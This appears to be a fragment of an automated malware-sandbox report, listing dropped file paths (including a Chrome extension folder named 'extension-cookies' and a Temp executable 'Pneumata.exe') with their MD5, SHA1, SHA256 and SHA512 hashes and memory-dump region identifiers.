SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

MD5 184829119ec9dd27f2c97fb9f2accd4e
SHA1 aa6652caa5ae6fcf316998d5546ca081577bccd8
SHA256 c5e1e6ea9fc48569d26235066bac249be39b49f751fe8eec3c58581a0cdb3b73
SHA512 e7256b639444a20ea6b16aa3f0c023afc2ec6c2994f92c1eebc02d4c28f275dc7c714f7945da3da5a8e83dd53b8283c632b4a9e7af88da609bf72c052a4b09ee

memory/4304-1067-0x0000024A53740000-0x0000024A53A95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\ffmpeg.dll

MD5 ce06702cdd37e286fc5e5204b28cdf6a
SHA1 72ed534a8364c43537f51d0a94d61ad833a67bab
SHA256 41494e1624ed48903bf4499ce92776267efc115b2402b45d5ad00bb5028dafba
SHA512 098d90517d23d15672d31331b61d82584c9cd42a0d2dbbc99d33e6ca7c72c1c293389507725abe8abc6e24765241453ec8d8dfefbe8b1092e42e778eec7a89eb

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

MD5 7a3d52494e094ec303ad26792860fddd
SHA1 d0334196ac7af6afc483d7d1439a9b699791f909
SHA256 d79fc74c93da5cf429f5f5bf47b5f456ef9380fa7e905e71f37ea562091071c6
SHA512 4991d0dc81ba0b7cc54ae65cac855fe00f78f6898023ef8f34e918ca5e733efdfd4fd4eb2e517bd3f835af82a73b17d8d1ddd3c173446b3d24d76c4c4834fa5e

memory/8028-1077-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1076-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1075-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1087-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1086-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1085-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1084-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1083-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1082-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/8028-1081-0x0000024E94350000-0x0000024E94351000-memory.dmp

memory/4304-1090-0x0000024A53740000-0x0000024A53A95000-memory.dmp